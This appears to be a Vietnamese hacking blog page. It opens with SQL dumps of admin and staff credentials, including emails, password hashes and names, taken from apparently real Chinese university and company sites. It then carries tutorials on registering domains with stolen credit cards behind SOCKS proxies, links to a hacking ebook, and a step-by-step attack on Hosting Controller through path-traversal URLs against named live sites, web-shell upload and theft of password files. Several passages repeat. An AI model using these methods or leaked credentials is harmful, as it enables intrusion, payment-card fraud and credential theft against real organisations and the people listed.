Trích:
http://www.szkite.org.cn/portals/0/1...er\90\DTS\Binn
Truy cập như 1 máy tính cá nhân
Trích:
Trích:
http://tjbdj.web.xtu.edu.cn:8082/
-- 导出表中的数据 `admin`
--
INSERT INTO `admin` (`id`, `username`, `passwd`) VALUES
(11, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997');
-- --------------------------------------------------------
Trích:
--
Trích:
http://www.headstone.com.cn
-- 导出表中的数据 `jos_users`
--
INSERT INTO `jos_users` VALUES (62, 'Administrator', 'admin', 'SSY828@163.COM', '3cbef4974931d1b766a6a14abc55e28c:qDeFi2MUzS14r7co ', 'Super Administrator', 0, 1, 25, '2007-09-20 15:33:31', '0000-00-00 00:00:00', '', 'expired=\nexpired_time=');
Trích:
--
Trích:
http://www.iest.zju.edu.cn/
导出表中的数据 `ec_member`
--
INSERT INTO `ec_member` (`m_id`, `username`, `userpass`, `state`, `usertype`) VALUES
(12, 'admin', '21232f297a57a5a743894a0e4a801fc3', 1, 10);
-- --------------------------------------------------------
Trích:
Trích:
http://sist.stdu.edu.cn
转存表中的数据 `jb3ad_users`
--
INSERT INTO `jb3ad_users` (`id`, `name`, `username`, `email`, `password`, `usertype`, `block`, `sendEmail`, `registerDate`, `lastvisitDate`, `activation`, `params`) VALUES
(42, '系统管理员', 'admin', 'jc@stdu.edu.cn', 'bb78d237b8dda52f4763988fd35bceea:GY5pOS9Jkqksa9xZ chMPfFFv9hAN0wMr', 'deprecated', 0, 1, '2012-04-13 02:57:34', '2012-05-24 0939', '0', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(43, '胡畅霞', 'hcx', 'huchx@stdu.edu.cn', '64380fdb1536c72ddf8d8370afd65643:6aH9R65VYcZCMlVq Qdfwz5FYyoqUKUbz', '', 0, 0, '2012-04-17 16:51:01', '2012-05-24 0931', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(45, '石玉晶', 'syj', 'shyj@stdu.edu.cn', '2d6f66f604f3dec5d77367c3828d563a:qBtxsqMMDLjI7X82 kiARmXPbACjGBSjq', '', 0, 0, '2012-04-18 14:41:09', '2012-05-24 09:17:25', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(46, '王学军', 'wxj', 'wangxj@stdu.edu.cn', 'ce71d2b98456c84acbda3be012e9c99b:zELSnnTn9Z4FwER6 JMTdC9488ScrZVcB', '', 0, 0, '2012-04-19 07:31:03', '2012-05-24 0958', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(47, '沈蒙波', 'smb', 'smb@stdu.edu.cn', '1223629de6649b13e2092d880082a0b9:39jVref9cjHtnq4j z5PUvjRBDDxUpY8M', '', 0, 0, '2012-05-24 08:17:48', '0000-00-00 00:00:00', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(48, '刘辉', 'lh', 'liuh@stdu.edu.cn', '940e584918cf063afcf25bfc63fcf440:oOUIocORoPVTbIMO 1jJXnLC5v7yxUXZx', '', 0, 0, '2012-05-24 08:18:31', '0000-00-00 00:00:00', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(49, '张玉梅', 'zym', 'zym@stdu.edu.cn', '832ebaca067275ff47f0c3e29fd159f7:a2PJIUXNNlOUvAga T3nPTuDwcHDMFRo6', '', 0, 0, '2012-05-24 08:19:15', '2012-05-24 08:19:36', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(50, '刘玉红', 'lyh', 'lyh@stdu.edu.cn', '958fe9f4c3a90d8e391b7f0fd6b778d1:rwBvKpsnt90hXdec IDhrZWu0V6hwq7Sz', '', 0, 0, '2012-05-24 08:20:21', '0000-00-00 00:00:00', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(51, '韩立华', 'hlh', 'hlh@stdu.edu.cn', '3f6963ee438752cd6ad2e40f19fdc6cc:VGbAQcnIe3yMvn7m R5Ea492gDaQmuO9w', '', 0, 0, '2012-05-24 08:21:02', '0000-00-00 00:00:00', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(52, '李静', 'lj', 'lj@stdu.edu.cn', 'cc741dacb46d5d03c210820574119460loAWWbsQi2zZtTL GPNZ61Qw7CFGcBXS', '', 0, 0, '2012-05-24 08:21:37', '0000-00-00 00:00:00', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(53, '郭芳', 'gf', 'gf@stdu.edu.cn', '17013c3318313d0f0a8545fa0709a93a:fJSsM2Yk8oSZb1mO yfPxVp4jrlXgkhKR', '', 0, 0, '2012-05-24 08:22:08', '0000-00-00 00:00:00', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}'),
(54, '李建华', 'ljh', 'ljh@stdu.edu.cn', '203877186c245f2ac85218ef956d3237:6ZfxOWWAAYrSvpSX uVyyiV9beF9QxkcC', '', 0, 0, '2012-05-24 08:22:41', '0000-00-00 00:00:00', '', '{"admin_style":"","admin_language":"","language": "","editor":"","helpsite":"","timezone":""}');
-- --------------------------------------------------------
Trích:
Trích:
http://gr.xupt.edu.cn
导出`dzjs_user`表中的数据 `dzjs_user`
--
INSERT INTO `dzjs_user` VALUES ('1','1','admin','9f83bf01286ff7662c8dbd2c90fb1111 e768f482','admin@yourphp.cn','admin','','','0','', '','','','','18','1338997359','1338997359','133998 6095','127.0.0.1','222.90.66.62','1','0.00','0','' );
INSERT INTO `dzjs_user` VALUES ('3','1','xuyjsb','34b1179a2ed9ecf83a07210519195d5 539af70a6','gr@xupt.edu.cn','','','','1','','','', '','','8','0','0','1339985937','','222.24.8.18','1 ','0.00','0','');
--
DEMON, Blog hacker , blog hacker viet nam , TUT local attack , TUT reg domain , TUT reg vps , TUT ship , TUT hack web , huong dan hack web,Blog IT, hacking, security, exploit, linux, local attack, xss, Tutorial, vBulletin, J2TeaM, Hacking and Security, Cross Site Scripting

Please wait...


28/1/13
Hướng dẫn reg domain Không bị die
Tut này hd các bạn reg domain yahoo.
Trước tiên các bạn cần chuẩn bị (socks 5 + 1 CC lived)
sau khi có đủ socks và cc rồi các bạn tiến hành các bước như sau:
bước đầu tiên là fake ip sau khi có một con socks có dạng : 24.174.91.226:54179
Nếu dùng IE các bạn làm như sau:
Quote:
các bạn vào IE rồi vào tool
sau đó click vào Internet Option...
Tiếp theo để clear hết cookie để % order tỷ lệ live domain cao hơn các bạn có thể click vào deletel cookie và deletel file
Sau khi clear cookie xong vào fake IP các bạn click vào Connextion>Lan Setting>Đánh dấu vào Proxy server
chọn Advanced
Phần socks các bạn gõ ô ở bên trái là 24.174.91.226 và ô ở bên phải là 54179 sau khi fake ok rồi các bạn có thể vào http://ip2location.com để kiểm tra địa chỉ ip của mình.Nếu là US thì OK
Còn với những ai thích dùng firefox hơn thì làm như sau:
Quote:
click vào Tools>Option>Privacity>Show cookies>Remove all cookies
làm như vậy để clear cookie
Tiếp theo, lài vào Tools>Option>Advanced>network>Clear now
2 lần làm như vậy để clear hết cookies.
để fake ip các bạn vào Tools>Option>Advanced>network>Setting>manual proxy
configuration để chạy socks các bạn điền vào phần socks như của IE
Và không muốn chạy nữa thì để nguyên như ban đâu nó để
Xong phần fake ip và clear cookie rồi bi giờ add card và hoàn tất thủ tục order
Các bạn vào http://domains.yahoo.com
Để reg domain mà
bước tiếp theo các bạn tìm chữ singup để đăng kí
Tiếp theo bạn check domain như bình thường
Sau khi đã check domain xong bạn có thể gõ domain mình cần reg vào đó rồi nhấn vào chữ search để check lun
Nếu như domain bạn cần reg mà chưa có ai reg thì nó sẽ hiện ra continue còn nếu như domain đã có người reg thì hiện ra một cái bảng
những vòng tròn có dấu x thì đã có người reg còn những vòng trọn trắng không có gì có nghĩa là bạn có thể tiếp tục đăng kí
Sau khi nhấn continue
Bạn sẽ thấy phần Domains
ở đó bạn chọn năm rồi sau đó tiếp tục nhấn continue
Sau đó bạn điền username và pass để đăng nhập vào
Tiếp theo bạn add card vào
Ở đây mình sẽ hướng dẫn cách add card để đề phòng những ai mà chưa biết dùng cc Card Type: Tên của card (VD master card)
Card Number: Số của card (VD:5267190200672372)
Card Verification: mã pin (VD:372)
Expiration Date: ngày hết hạn của card (VD: 01/08)
Name on Card: Tên của card (VD: Linda Barton)
Card Nickname: điền cái gì cũng được)
Billing Address (line 1): địa chỉ thẻ (VD: A17-416 meridian Rd SE)
City: thành phô của thẻ (VD:Calgary)
State: Bang của thẻ (VD: Alberta)
Zip/Postal Code: mã số bang cc(VD: 36720)
Country: nước (VD: United States)
Telephone Number: phone của chủ thẻ (VD: 403-293-3261)
Sau đó đánh dấu vào dòng tiếp theo
Cuối cùng nhấn continue
Cứ thế mà nhấn continue cho đến khi nhận đuợc mail confirm
Nếu CC diea thì không làm đuợc bước tiếp theo
Chờ 15 > 20 phút sau bạn sẽ nhận được mail Active
Thế là bạn đã hoàn tất phần older domain rồi đó
Nhưng bạn older xong nếu mà để im như thế này thì chắc chắn domain của bạn sẽ không lived được quá 5 ngày
Vậy để domain có thể lived thì bạn hãy chuyển quyền quany lý của domain sang cho thằng khác quản lý để domain có thể lived cho đến hết thời hạn đăng kí cho dù yahoo có bị cancel
Sau đây mình sẽ hướng dẫn bạn chuyển domains sang thằng sitelutions.com để quản lý và cũng để tồn tại domain cho đến ngày hết hạn đăng kí
http://www.sitelutions.com/ <==các bạn vào đây để đăng kí
đăng kí như đăng kí host free bình thường thôi mà chắc là không hướng dẫn các bạn cũng biết chỉ việc kicks vào nút singup
Bạn đợi 10-15 phút thì nó mới login được
để login username: tenban@mail.com và pas là mật khẩu lúc đăng kí
sau đó bạn login vào và add domain (cái này tự nguyên cứu)
đăng kí xong thằng này thì thằng yahoo đã gửi mail Active cho bạn rồi
Lúc này bạn login vào yahoo để change dns
Còn login xong rồi bạn vào http://domains.yahoo.com để dns và cpanel quản lý domaín và change domain của bạn đến
mún dns được thì bạn nhớ phải unlock đó
Sau khi unlock phải chờ 48 giờ sau hãng change dns và change dns free dến một nới khác đê
ns1.sitelutions.com
ns2.sitelutions.com
nhớ là vẫn dùng socks lúc reg
dns xong bạn thử vào domain của bạn xem sao
Lúc này domain của bạn đã chỉ đến thằng sitelutions.com
Và bạn cũng đừng vào yahoo để quản lý nữa vì như thế domain của bạn sẽ diea
Bi giờ bạn hãy vào sitelutions.com để mà quany lý và dĩ nhiên bạn sẽ không dns được nữa mà chỉ fowload và change sang ip của host thôi
Thế là bạn đã older được domain rồi đó
Với cách trên tỉ lệ thành công của các bạn là 95/100 thành công.
Lưu ý : khi reg xong 1 ngày login vào mail 1 lần liên tục trong vòng 1 tuần đâu khi mới reg
Trước tiên các bạn cần chuẩn bị (socks 5 + 1 CC lived)
sau khi có đủ socks và cc rồi các bạn tiến hành các bước như sau:
bước đầu tiên là fake ip sau khi có một con socks có dạng : 24.174.91.226:54179
Nếu dùng IE các bạn làm như sau:
Quote:
các bạn vào IE rồi vào tool
sau đó click vào Internet Option...
Tiếp theo để clear hết cookie để % order tỷ lệ live domain cao hơn các bạn có thể click vào deletel cookie và deletel file
Sau khi clear cookie xong vào fake IP các bạn click vào Connextion>Lan Setting>Đánh dấu vào Proxy server
chọn Advanced
Phần socks các bạn gõ ô ở bên trái là 24.174.91.226 và ô ở bên phải là 54179 sau khi fake ok rồi các bạn có thể vào http://ip2location.com để kiểm tra địa chỉ ip của mình.Nếu là US thì OK
Còn với những ai thích dùng firefox hơn thì làm như sau:
Quote:
click vào Tools>Option>Privacity>Show cookies>Remove all cookies
làm như vậy để clear cookie
Tiếp theo, lài vào Tools>Option>Advanced>network>Clear now
2 lần làm như vậy để clear hết cookies.
để fake ip các bạn vào Tools>Option>Advanced>network>Setting>manual proxy
configuration để chạy socks các bạn điền vào phần socks như của IE
Và không muốn chạy nữa thì để nguyên như ban đâu nó để
Xong phần fake ip và clear cookie rồi bi giờ add card và hoàn tất thủ tục order
Các bạn vào http://domains.yahoo.com
Để reg domain mà
bước tiếp theo các bạn tìm chữ singup để đăng kí
Tiếp theo bạn check domain như bình thường
Sau khi đã check domain xong bạn có thể gõ domain mình cần reg vào đó rồi nhấn vào chữ search để check lun
Nếu như domain bạn cần reg mà chưa có ai reg thì nó sẽ hiện ra continue còn nếu như domain đã có người reg thì hiện ra một cái bảng
những vòng tròn có dấu x thì đã có người reg còn những vòng trọn trắng không có gì có nghĩa là bạn có thể tiếp tục đăng kí
Sau khi nhấn continue
Bạn sẽ thấy phần Domains
ở đó bạn chọn năm rồi sau đó tiếp tục nhấn continue
Sau đó bạn điền username và pass để đăng nhập vào
Tiếp theo bạn add card vào
Ở đây mình sẽ hướng dẫn cách add card để đề phòng những ai mà chưa biết dùng cc Card Type: Tên của card (VD master card)
Card Number: Số của card (VD:5267190200672372)
Card Verification: mã pin (VD:372)
Expiration Date: ngày hết hạn của card (VD: 01/08)
Name on Card: Tên của card (VD: Linda Barton)
Card Nickname: điền cái gì cũng được)
Billing Address (line 1): địa chỉ thẻ (VD: A17-416 meridian Rd SE)
City: thành phô của thẻ (VD:Calgary)
State: Bang của thẻ (VD: Alberta)
Zip/Postal Code: mã số bang cc(VD: 36720)
Country: nước (VD: United States)
Telephone Number: phone của chủ thẻ (VD: 403-293-3261)
Sau đó đánh dấu vào dòng tiếp theo
Cuối cùng nhấn continue
Cứ thế mà nhấn continue cho đến khi nhận đuợc mail confirm
Nếu CC diea thì không làm đuợc bước tiếp theo
Chờ 15 > 20 phút sau bạn sẽ nhận được mail Active
Thế là bạn đã hoàn tất phần older domain rồi đó
Nhưng bạn older xong nếu mà để im như thế này thì chắc chắn domain của bạn sẽ không lived được quá 5 ngày
Vậy để domain có thể lived thì bạn hãy chuyển quyền quany lý của domain sang cho thằng khác quản lý để domain có thể lived cho đến hết thời hạn đăng kí cho dù yahoo có bị cancel
Sau đây mình sẽ hướng dẫn bạn chuyển domains sang thằng sitelutions.com để quản lý và cũng để tồn tại domain cho đến ngày hết hạn đăng kí
http://www.sitelutions.com/ <==các bạn vào đây để đăng kí
đăng kí như đăng kí host free bình thường thôi mà chắc là không hướng dẫn các bạn cũng biết chỉ việc kicks vào nút singup
Bạn đợi 10-15 phút thì nó mới login được
để login username: tenban@mail.com và pas là mật khẩu lúc đăng kí
sau đó bạn login vào và add domain (cái này tự nguyên cứu)
đăng kí xong thằng này thì thằng yahoo đã gửi mail Active cho bạn rồi
Lúc này bạn login vào yahoo để change dns
Còn login xong rồi bạn vào http://domains.yahoo.com để dns và cpanel quản lý domaín và change domain của bạn đến
mún dns được thì bạn nhớ phải unlock đó
Sau khi unlock phải chờ 48 giờ sau hãng change dns và change dns free dến một nới khác đê
ns1.sitelutions.com
ns2.sitelutions.com
nhớ là vẫn dùng socks lúc reg
dns xong bạn thử vào domain của bạn xem sao
Lúc này domain của bạn đã chỉ đến thằng sitelutions.com
Và bạn cũng đừng vào yahoo để quản lý nữa vì như thế domain của bạn sẽ diea
Bi giờ bạn hãy vào sitelutions.com để mà quany lý và dĩ nhiên bạn sẽ không dns được nữa mà chỉ fowload và change sang ip của host thôi
Thế là bạn đã older được domain rồi đó
Với cách trên tỉ lệ thành công của các bạn là 95/100 thành công.
Lưu ý : khi reg xong 1 ngày login vào mail 1 lần liên tục trong vòng 1 tuần đâu khi mới reg
27/1/13
Video Tut bug ChangUonDyU - Advanced Statistics SQL injection
AE tải về tham khảo nha!!!
Tut mới viết hồi nãy,ae xem thử nha
http://www.mediafire.com/?a6reem804aqg0um
Điều khiển máy tính từ xa qua Gmail
Có một vài tiện ích cho phép tạo kết nối điều khiến từ xa với máy tính.
Nếu bạn đang cần gấp một kết nối để điều khiển máy tính từ xa mà chỉ yêu
cầu mức cơ bản với cấu hình tối thiểu thì bạn có thể thực hiện thông
qua tài khoản Gmail. sRemote là một ứng dụng bỏ túi nhỏ cho phép điều
khiển từ xa máy tính thông qua tài khoản Gmail. Chương trình cho phép
thực hiện một số câu lệnh cơ bản trên máy đầu xa qua Gmail.
Tải sRemote về máy. Giải nén file zip trong một thư mục. Khi sử dụng sRemote lần đầu tiên, chương trình sẽ đề nghị người dùng tạo một mật khẩu để truy cập máy tính mà sRemote đang chạy trên đó.

Lưu ý rằng không nên cung cấp mật khẩu này cho người khác bởi vì bất cứ ai có mật khẩu này đều có thể điều khiển từ xa máy tính của bạn.
Bước tiếp theo liên quan đến việc thiết lập chứng thực Gmail cho sRemote. Chỉ cần kích vào Gmail settings và nhập địa chỉ Gmail, mật khẩu và địa chỉ hồi đáp.

Một điều lưu ý là nếu người dùng đã kích hoạt chế độ xác thực hai bước trong tài khoản Gmail thì sẽ cần cấu hình một mật khẩu mới cho ứng dụng sRemote. Mật khẩu gốc cho tài khoản Gmail sẽ không có hiệu lực.
Sau khi cấu hình xong các thiết lập tài khoản Gmail, kích vào nút Start monitoring. sRemote sẽ kiểm tra tài khoản Gmail người dùng. Khoảng thời gian giám sát mặc định là 5 giây nhưng ta có thể cấu hình lại tùy theo yêu cầu.

Và đây là phần thú vị nhất khi bạn sẽ thực hiện ra lệnh cho máy tính đầu xa. Người dùng có thể sử dụng bất kỳ địa chỉ email nào và bất cứ thiết bị nào. Về cơ bản, người dùng sẽ phải gửi một email với cú pháp câu lệnh đặc biệt đến tài khoản Gmail đã được cấu hình trước đó (trong sRemote). Ví dụ như, nếu ta có email mycomputer@gmail.com được cấu hình trong sRemote, có thể gửi một email từ anyone@hotmail.com đến mycomputer@gmail.com với cú pháp sau:
password() ;command() ;
Với “password()” là mật khẩu người dùng đã cấu hình khi khởi động sRemote và “command()” là bất cứ câu lệnh nào mà sRemote hỗ trợ. Những câu lệnh này phải nằm trong dòng subject của email.

Xét tổng thể thì sRemote là một chương trình tiện dụng và thực sự hữu ích khi ai đó đang cần gấp một kết nối điều khiển từ xa trong vài phút. Có hai điểm cần được cải thiện trong sRemote. Thứ nhất là sRemote không hỗ trợ các địa chỉ Google Apps mà cũng sử dụng công nghệ của Gmail. Thứ hai, không có xác nhận cho biết câu lệnh có được thực hiện trên máy tính đầu xa hay không. Có lẽ, cần có một email hồi đáp thông báo rằng, câu lệnh đã được thực hiện thành công trên máy đầu xa.
Link sRemote: https://sites.google.com/site/venuss...edirects=0&d=1
NamNguyen (Theo MakeTechEasier)
Tải sRemote về máy. Giải nén file zip trong một thư mục. Khi sử dụng sRemote lần đầu tiên, chương trình sẽ đề nghị người dùng tạo một mật khẩu để truy cập máy tính mà sRemote đang chạy trên đó.

Lưu ý rằng không nên cung cấp mật khẩu này cho người khác bởi vì bất cứ ai có mật khẩu này đều có thể điều khiển từ xa máy tính của bạn.
Bước tiếp theo liên quan đến việc thiết lập chứng thực Gmail cho sRemote. Chỉ cần kích vào Gmail settings và nhập địa chỉ Gmail, mật khẩu và địa chỉ hồi đáp.

Một điều lưu ý là nếu người dùng đã kích hoạt chế độ xác thực hai bước trong tài khoản Gmail thì sẽ cần cấu hình một mật khẩu mới cho ứng dụng sRemote. Mật khẩu gốc cho tài khoản Gmail sẽ không có hiệu lực.
Sau khi cấu hình xong các thiết lập tài khoản Gmail, kích vào nút Start monitoring. sRemote sẽ kiểm tra tài khoản Gmail người dùng. Khoảng thời gian giám sát mặc định là 5 giây nhưng ta có thể cấu hình lại tùy theo yêu cầu.

Và đây là phần thú vị nhất khi bạn sẽ thực hiện ra lệnh cho máy tính đầu xa. Người dùng có thể sử dụng bất kỳ địa chỉ email nào và bất cứ thiết bị nào. Về cơ bản, người dùng sẽ phải gửi một email với cú pháp câu lệnh đặc biệt đến tài khoản Gmail đã được cấu hình trước đó (trong sRemote). Ví dụ như, nếu ta có email mycomputer@gmail.com được cấu hình trong sRemote, có thể gửi một email từ anyone@hotmail.com đến mycomputer@gmail.com với cú pháp sau:
password() ;command() ;
Với “password()” là mật khẩu người dùng đã cấu hình khi khởi động sRemote và “command()” là bất cứ câu lệnh nào mà sRemote hỗ trợ. Những câu lệnh này phải nằm trong dòng subject của email.

Xét tổng thể thì sRemote là một chương trình tiện dụng và thực sự hữu ích khi ai đó đang cần gấp một kết nối điều khiển từ xa trong vài phút. Có hai điểm cần được cải thiện trong sRemote. Thứ nhất là sRemote không hỗ trợ các địa chỉ Google Apps mà cũng sử dụng công nghệ của Gmail. Thứ hai, không có xác nhận cho biết câu lệnh có được thực hiện trên máy tính đầu xa hay không. Có lẽ, cần có một email hồi đáp thông báo rằng, câu lệnh đã được thực hiện thành công trên máy đầu xa.
Link sRemote: https://sites.google.com/site/venuss...edirects=0&d=1
NamNguyen (Theo MakeTechEasier)
Ebook hacking tổng hợp
Nội dung:
- Kiến thức hack cơ bản
- Bot net, hack sever, hack via Rfi, get root....
- Shell, local basic...và nhiều thứ khác
http://www.mediafire.com/?38rqrnow9e05b
- Kiến thức hack cơ bản
- Bot net, hack sever, hack via Rfi, get root....
- Shell, local basic...và nhiều thứ khác
http://www.mediafire.com/?38rqrnow9e05b
[ HOT ] Nhận 45.000 tiền điện thoại và 20Mb DATA Miến Phí
http://www.mobifone.com.vn/web/vn/home/promotion.jsp?id=3520
soạn tin QC gởi 9241 - sau 1 phút báo 1 tin nhắn đến ,3-5 PHÚT SẼ CÓ sms báo và kiểm tra tài khoản
soạn tin QC gởi 9241 - sau 1 phút báo 1 tin nhắn đến ,3-5 PHÚT SẼ CÓ sms báo và kiểm tra tài khoản
Hack Server NT qua bug Hosting Controller
Hôm nay tôi sẽ hướng dẫn các bac cách hack Server và Website qua lỗi Hosting Controller !
Như các bạn đã thấy hiện giờ đã xuất hiện rất nhiều máy chủ trên thế giới (theo tôi kiểm tra và thử nghiệm trên 12 server hiện giờ vẫn chưa fix lỗi này) bị lỗi Hostingcontroller.
Hôm nay tôi xin nói về lỗi Hosting controller (HC) này :
Chú ý : Tôi viết bài này chỉ để các bạn học hỏi. Nếu có Hack thì chỉ nên thêm 1 file vào trong website để chứng tỏ là mình đã Hack. Không nên phá hoại làm ảnh hưởng đến nhiều người nha
+ Lỗi HC là lỗi của phần mềm Hosting Controller dùng để quản lý server cung cấp domain và hosting cho khách hàng thường được chạy dưới Win2000/NT. Tôi sẽ Hack qua lỗi HC và sẽ ví dụ với 1 server chưa fix đó là server chứa 38 site mà đã được Hacker Forum Hacked vào tháng trước .
+ Lỗi HC cho bạn thực hiện 1 dòng lệnh để đọc ổ cứng ( C; D; E ) thậm chí cả ổ A
của server qua 1 site hoặc trực tiếp bằng ID của server. Lỗi HC thực chất là bị lỗi của 4 file nằm trong phần mềm là : statsbrowse.asp ; servubrowse.asp ; browsedisk.asp ; browsewebalizerexe.asp ; sqlbrowse.asp
Tôi sẽ viết cấu trúc của lệnh Hack vào server nhờ lỗi 4 file này :
..................
Trong đó HC có thể là : admin ; advadmin; hostingcontroller
Lỗi đầu tiên tôi giới thiệu với các bạn có tên Multiple security vulnerabilities. Đây là các đoạn Script cho phép bạn duyệt bất cứ file nào trên Server :
http://www.victim.com/advwebadmin/stats/statsbrowse.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
http://www.victim.com/advwedadmin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
Trong đó Victim là Server bị lỗi HC mà bạn muốn Hack
Tôi sẽ ví dụ các Hack server qua 1 site nằm trong server (hay còn gọi là Hack
local exploit)
VD : site này đã bị Hacker Forum hack : http://123hollywood.com/hf.htm
ở thanh Address bạn đánh 1 trong các dòng lệnh sau :
http://123hollywood.com/admin/stats/statsbrowse.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/serv_u/servubrowse.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/adminsettings/browsedisk.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/adminsettings/browsewebalizerexe.asp?filepath=c:\&Opt=3
http://123hollywood.com/admin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
Lúc nãy bạn sẽ vào được phần "Browser Directories". Đây là toàn bộ cấu trúc của Website đó. Khi các bạn đã vào được bên trong của ổ C:\ bạn thấy có thư mục websites (đối với server đang thử nghiệm này, còn đối với các server khác thì nó thường nằm ở ổ D:/) .
Nếu bạn đã thấy thì OK . Bạn hãy vào trong và thấy 1 loạt các website. Với server chúng ta đang Hack ở trên bạn sẽ thấy các website được đưa vào các thư mục riêng lẻ theo vần. Chúng ta hãy tìm tới website mà nhờ nó chúng ta vào dược server này .
Bạn hãy vào 123web/123kinh/123hollywood.com/www/. Bạn thấy đó cực kỳ đơn giản đúng không .
Sau khi biết được đường dẫn của site cần Hack thì bạn dùng Script sau :
http://www.example.com/advwebadmin/folders/filemanager.asp&siteindex=testing&sitename=testing .com&OpenPath= C:\webspace\resadmin\testing\testing.com\www\..\.. \..\..\..\
Thay example bằng tên của Server và testing bằng tên trang Web muốn Hack
Ví dụ : Bạn đăng ký Website tên cuonglong của FPT thì tụi FPT sẽ cho bạn một nơi để trang Web : c:\webspace\resadmin\cuonglong\cuonglong.com\www
Muốn Hack trang này thì bạn đánh Script như trên :
http://www.ftp.com/advwebadmin/folders/filemanager.asp&siteindex=cuonglong&sitename=cuong long.com&OpenPath= C:\webspace\resadmin\cuonglong\cuonglong.com\www\. .\..\..\..\..\
Vậy là bạn đã vào được cấu trúc thư mục của Web đó nhưng lúc này bạn chỉ quyền upload 1 file nào đó từ ổ cứng của bạn lên site đó thôi
Sau đó bạn upload file ntdaddy.asp Website đó. Và chạy file này trên Website đó để lấy những file *.mdb và *.SAM về, đây là file chứa password, bạn chỉ việc giải mã ra
Vậy là bạn đã Hack được Website đó rồi
Bây giờ tôi sẽ hướng dẫn các bạn cách upload và xoá file trên các site này :
Cái này thì cũng cực kỳ đơn giản, bạn hãy xem mẫu sau :
http://www.eg.com/hc/folders/filemanager.asp&siteindex=testing&sitename=testing .com&OpenPath=C:/webspace/..\
trong đó testing là các đường dẫn vào website mà bạn muốn upload ; OK !
Bây giờ thì bạn có thể nghịch thoải mái; Bạn có thể cho toàn bộ site die trong
1 giờ cũng được hi hi ..
Còn 1 vài lỗi nữa của HC, trong đó có lỗi cho phép bạn có khả năng khởi tạo cho mình 1 hosting trong server nhờ dòng lệnh sau :
http://victim.com/admin/autosignup/dsp_newwebadmin.asp
Cũng như trên, Victim là Server bị lỗi HC mà bạn muốn Hack. Ví dụ đó là Website http://bigguy.ourweb.net/
http://bigguy.ourweb.net/AdvAdmin/autosignup/dsp_newwebadmin.asp
Mình đã khởi tạo cái này, các bác vô xem : http://www.hackerforum.com/
Lỗi này cho phép cho đăng ký free Domain. Bạn hãy đăng ngay 1 Domain cho mình rồi vào http://www.victim.com/AdvAmin/ để Login với với Account vừa đăng ký. Sau khi Login, bạn click vào mục Directories trên menu rồi vào Domain của bạn. Sau đó, bạn hãy upload trang web của mình lên (nơi upload ở dưới cùng) và nhớ là tên trang web đừng dài, rồi click vào logout (ở bên phải trên cùng). Vậy là ta đã đi được nửa chặng đường
Tiếp theo bạn hãy vào : http://www.victim.com/AdvAdmin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\Program%20 Files\Advanced%20Communications\NT%20Web%20Hosting %20Controller\web\admin&owwwPath=C:\&oftpPath=F:\w ww-f\resadmin\username\www.yourdomain.com\www
Bạn hãy thay chữ "username" bằng username lúc đầu bạn đăng ký Domain và thay chữ www.yourdomain.com bằng địa chỉ Domain mà bạn đăng ký và enter. Ví dụ tôi đăng ký 1 Domain tên www.cuonglong.com với username là ncviet ở Website http://bigguy.ourweb.net/ thì tôi sẽ gõ :
http://bigguy.ourweb.net/AdvAdmin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\Program%20 Files\Advanced%20Communications\NT%20Web%20Hosting %20Controller\web\admin&owwwPath=C:\&oftpPath=F:\w ww-f\resadmin\ncviet\www.cuonglong.com\www
Đây là phần Import của Website. Nó sẽ hiện ra 4 khung đường dẫn. Bây giờ bạn hãy tìm trang web của mình ở khung thứ nhất bên dưới và click vào nó rồi nhấn nút "import". Bây giờ nó đã copy trang Web của bạn vào khung thứ hai bên dưới. Ok, vậy là bạn đã Hack xong rồi đó. ví dụ bạn upload file cl.htm thì đường dẫn Web của bạn sẽ là :
http://bigguy.ourweb.net/AdvAdmin/cl.htm
Chú ý : www.victim.com sẽ được thay bằng Website bị lỗi hc. Và có thể trong quá trình hack, server sẽ bắt giữ IP của bạn vì vậy bạn nên ngụy trang cho thật khéo .
Bạn có thể tìm rất nhiều server hiện vẫn còn đang bị lỗi này bằng cách và http://www.google.com rồi nhập từ khoá "Hosting Controller" cho nó Search.
Tiếp theo là một lỗi slash dot dot của HC cho phép ta thấy được đường dẫn các ổ đĩa và các thư mục của server và ta có thể lợi dụng nó để add (thêm vào) một đường dẫn DSN để chỉ tới một địa chỉ mới. Để khai thác lỗi này bạn dùng đoạn code sau :
http://www.target.com/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath= bspace\opendnsserver\target\target.com\db\..\..\.. \..\
Cái thứ hai là chúng ta có thể thay đổi hoàn toàn hay add vào thư mục admin và thi hành những gì chúng ta muốn. Để khai thác lỗi này chỉ cần đưa vào đoạn code sau :
http://www.target.com/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath= C:\&oftpPath=C:\
Bạn có thể nắm quyền điều khiển toàn bộ các file trong thư mục (và có thể là cả C:\) và thay đổi tùy thích..
